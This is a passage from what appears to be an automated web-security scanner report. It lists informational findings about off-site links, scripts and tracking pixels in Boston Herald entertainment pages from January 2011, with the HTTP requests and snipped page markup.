<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...

17.163. http://bostonherald.com/track/star_tracks/view.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/track/star_tracks/view.bg

Issue detail

The page was loaded from a URL containing a query string:

http://bostonherald.com/track/star_tracks/view.bg?articleid=1312549&format=comments&srvc=track&position=3

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Ftrack%2Fstar_tracks%2Fview%2F20110128startracks%2Fformat%3Dcomments%26position%3Dalso&c5=&c6=&c15=
http://bostonherald.boocoo.com/
http://bostonheraldnie.newspaperdirect.com/
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png
http://cache.heraldinteractive.com/images/siteImages/icons/comments_reply.png
http://cache.heraldinteractive.com/images/siteImages/icons/fontLarge.gif
http://cache.heraldinteractive.com/images/siteImages/icons/fontSmall.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniAbuse.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniEmail.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniPrint.gif
http://cache.heraldinteractive.com/images/siteImages/icons/page_white_link.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png
http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png
http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png
http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png
http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png
http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tg_tv_tease_315x100_animated.gif
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://feeds.feedburner.com/bostonherald/track/star_tracks/
http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=
http://multimedia.heraldinteractive.com/images/20110127/67bc6f_beebs_01282011.jpg
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif
http://s7.addthis.com/js/200/addthis_widget.js
http://twitter.com/bostonherald
http://widget.newsinc.com/toppicks_bostonherald_ent.html
http://www.addthis.com/bookmark.php?v=20
http://www.bostonheraldineducation.com/
http://www.carfind.com/
http://www.collegeanduniversity.net/herald/
http://www.facebook.com/pages/BostonHeraldcom/197211981599
http://www.heraldmedia.com/privacy.html
http://www.homefind.com/
http://www.legacy.com/obituaries/bostonherald/
http://www.massliteracy.org/
http://www.quantcast.com/p-352ZWwG8I7OVQ
http://www.uclick.com/client/boh/sudoc/

Request

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:21:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 67934

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Ftrack%2Fstar_tracks%2Fview%2F20110128startracks%2Fformat%3Dcomments%26position%3Dalso&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/">
<img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer">
</a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features">

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>

<a href="http://www.addthis.com/bookmark.php?v=20" onmouseover="return addthis_open(this, '', '[URL]', 'Justin Bieber sings PETA’s praises');" onmouseout="addthis_close();" onclick="return addthis_sendto();"><img class="line_icon" src="/images/siteImages/icons/share-icon-16x16.png" width="16" height="16" alt="Bookmark and Share" style="border:0"/>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...

<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png" width="2" height="17" />
<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png" width="2" height="17" /></div>
...[SNIP]...
<a href="javascript:;" title="Good Comment" onclick="addRating(1982415,5,0);" ><img id="thumb_up_1982415" class="thumb_up" alt="Good Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png'" /></a>
...[SNIP]...
<a href="javascript:;" title="Poor Comment" onclick="addRating(1982415,1,0);"><img id="thumb_down_1982415" class="thumb_down" alt="Poor Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'"onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png'" /></a>
...[SNIP]...
<a class="Reply" href="#CommentPostArea" onclick="setReplyToField(1982415, 'bfocus');" ><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/comments_reply.png" /> Reply</a>
...[SNIP]...
<a href="/track/star_tracks/view.bg?articleid=1312549&format=comments&cnum=1&at_comment=1982415#cnum1982415"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/page_white_link.png" /> Link</a>
...[SNIP]...
<a class="Flag" href="#" onclick="flagPost('1982415','/track/star_tracks/view.bg?articleid=1312549&cnum=1'); return false;"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniAbuse.gif"> Abusive</a>
...[SNIP]...

<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png" width="2" height="17" />
<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png" width="2" height="17" /></div>
...[SNIP]...
<a href="javascript:;" title="Good Comment" onclick="addRating(1983296,5,0);" ><img id="thumb_up_1983296" class="thumb_up" alt="Good Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png'" /></a>
...[SNIP]...
<a href="javascript:;" title="Poor Comment" onclick="addRating(1983296,1,0);"><img id="thumb_down_1983296" class="thumb_down" alt="Poor Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'"onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png'" /></a>
...[SNIP]...
<a class="Reply" href="#CommentPostArea" onclick="setReplyToField(1983296, 'herkbabe');" ><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/comments_reply.png" /> Reply</a>
...[SNIP]...
<a href="/track/star_tracks/view.bg?articleid=1312549&format=comments&cnum=1&at_comment=1983296#cnum1983296"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/page_white_link.png" /> Link</a>
...[SNIP]...
<a class="Flag" href="#" onclick="flagPost('1983296','/track/star_tracks/view.bg?articleid=1312549&cnum=1'); return false;"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniAbuse.gif"> Abusive</a>
...[SNIP]...

<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png" width="2" height="17" />
<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png" width="2" height="17" /></div>
...[SNIP]...
<a href="javascript:;" title="Good Comment" onclick="addRating(1983314,5,0);" ><img id="thumb_up_1983314" class="thumb_up" alt="Good Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png'" /></a>
...[SNIP]...
<a href="javascript:;" title="Poor Comment" onclick="addRating(1983314,1,0);"><img id="thumb_down_1983314" class="thumb_down" alt="Poor Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'"onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png'" /></a>
...[SNIP]...
<a class="Reply" href="#CommentPostArea" onclick="setReplyToField(1983314, 'needham');" ><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/comments_reply.png" /> Reply</a>
...[SNIP]...
<a href="/track/star_tracks/view.bg?articleid=1312549&format=comments&cnum=1&at_comment=1983314#cnum1983314"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/page_white_link.png" /> Link</a>
...[SNIP]...
<a class="Flag" href="#" onclick="flagPost('1983314','/track/star_tracks/view.bg?articleid=1312549&cnum=1'); return false;"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniAbuse.gif"> Abusive</a>
...[SNIP]...

<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png" width="2" height="17" />
<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png" width="2" height="17" /></div>
...[SNIP]...
<a href="javascript:;" title="Good Comment" onclick="addRating(1983547,5,0);" ><img id="thumb_up_1983547" class="thumb_up" alt="Good Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png'" /></a>
...[SNIP]...
<a href="javascript:;" title="Poor Comment" onclick="addRating(1983547,1,0);"><img id="thumb_down_1983547" class="thumb_down" alt="Poor Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'"onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png'" /></a>
...[SNIP]...
<a class="Reply" href="#CommentPostArea" onclick="setReplyToField(1983547, 'JulieTheJarhead');" ><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/comments_reply.png" /> Reply</a>
...[SNIP]...
<a href="/track/star_tracks/view.bg?articleid=1312549&format=comments&cnum=1&at_comment=1983547#cnum1983547"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/page_white_link.png" /> Link</a>
...[SNIP]...
<a class="Flag" href="#" onclick="flagPost('1983547','/track/star_tracks/view.bg?articleid=1312549&cnum=1'); return false;"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniAbuse.gif"> Abusive</a>
...[SNIP]...
</a>  |  <a class="LinksRedNone" style="text-decoration:underline" href="http://www.heraldmedia.com/privacy.html" target="_new">Privacy commitment</a>
...[SNIP]...
<a href="/track/star_tracks/view.bg?articleid=1312549&format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
alt="Comments" />(4) Comments  |  Post / Read Comments</a>
...[SNIP]...
<div id="nextArticleTease" style="display:block">
<img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif"> <b>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<a href="/track/track_gals_tv/"><img style="border: 1px solid rgb(102, 102, 102);" src="http://cache.heraldinteractive.com/images/version5.0/site_images/tg_tv_tease_315x100_animated.gif"></a>
...[SNIP]...
<div id="trackPhotoGalleryPicArea"><img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20110127/67bc6f_beebs_01282011.jpg" alt="Justin Bieber." /></div>
...[SNIP]...

<iframe style="position:relative; margin-bottom: 16px;" src="http://widget.newsinc.com/toppicks_bostonherald_ent.html" frameborder="0" scrolling="no" width="300" height="225"></iframe>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...

17.164. http://bostonherald.com/track/star_tracks/view.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/track/star_tracks/view.bg

Issue detail

The page was loaded from a URL containing a query string:

http://bostonherald.com/track/star_tracks/view.bg?articleid=1312549&srvc=track&position=3

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Ftrack%2Fstar_tracks%2Fview%2F20110128startracks%2Fsrvc%3Dtrack%26position%3Dalso&c5=&c6=&c15=
http://bostonherald.boocoo.com/
http://bostonheraldnie.newspaperdirect.com/
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png
http://cache.heraldinteractive.com/images/siteImages/icons/fontLarge.gif
http://cache.heraldinteractive.com/images/siteImages/icons/fontSmall.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniEmail.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniPrint.gif
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png
http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tg_tv_tease_315x100_animated.gif
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://feeds.feedburner.com/bostonherald/track/star_tracks/
http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=
http://multimedia.heraldinteractive.com/images/20110127/67bc6f_beebs_01282011.jpg
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif
http://s7.addthis.com/js/200/addthis_widget.js
http://twitter.com/bostonherald
http://widget.newsinc.com/toppicks_bostonherald_ent.html
http://www.addthis.com/bookmark.php?v=20
http://www.bostonheraldineducation.com/
http://www.carfind.com/
http://www.collegeanduniversity.net/herald/
http://www.facebook.com/pages/BostonHeraldcom/197211981599
http://www.heraldmedia.com/privacy.html
http://www.homefind.com/
http://www.legacy.com/obituaries/bostonherald/
http://www.massliteracy.org/
http://www.quantcast.com/p-352ZWwG8I7OVQ
http://www.uclick.com/client/boh/sudoc/

Request

GET /track/star_tracks/view.bg?articleid=1312549&srvc=track&position=3 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:21:49 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 38996

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Ftrack%2Fstar_tracks%2Fview%2F20110128startracks%2Fsrvc%3Dtrack%26position%3Dalso&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/">
<img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer">
</a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features">

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>

<a href="http://www.addthis.com/bookmark.php?v=20" onmouseover="return addthis_open(this, '', '[URL]', 'Justin Bieber sings PETA’s praises');" onmouseout="addthis_close();" onclick="return addthis_sendto();"><img class="line_icon" src="/images/siteImages/icons/share-icon-16x16.png" width="16" height="16" alt="Bookmark and Share" style="border:0"/>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
<a href="/track/star_tracks/view.bg?articleid=1312549&format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
alt="Comments" />(4) Comments  |  Post / Read Comments</a>
...[SNIP]...
<div id="nextArticleTease" style="display:block">
<img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif"> <b>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<a href="/track/track_gals_tv/"><img style="border: 1px solid rgb(102, 102, 102);" src="http://cache.heraldinteractive.com/images/version5.0/site_images/tg_tv_tease_315x100_animated.gif"></a>
...[SNIP]...
<div id="trackPhotoGalleryPicArea"><img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20110127/67bc6f_beebs_01282011.jpg" alt="Justin Bieber." /></div>
...[SNIP]...

<iframe style="position:relative; margin-bottom: 16px;" src="http://widget.newsinc.com/toppicks_bostonherald_ent.html" frameborder="0" scrolling="no" width="300" height="225"></iframe>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...

17.165. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://c7.zedo.com
Path:	/bar/v16-401/c5/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:

http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js?c=167&a=0&f=&n=1220&r=13&d=14&q=&$=&s=126&l=http%3A//hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63723/0/cj/V12D7843BC0J-573I704K63342ADC1D6F3ADC1D6F3K82427K82131QK63359QQP0G00G0Q05BC4B4000001E/&z=0.9975781855173409

The response contains the following link to another domain:

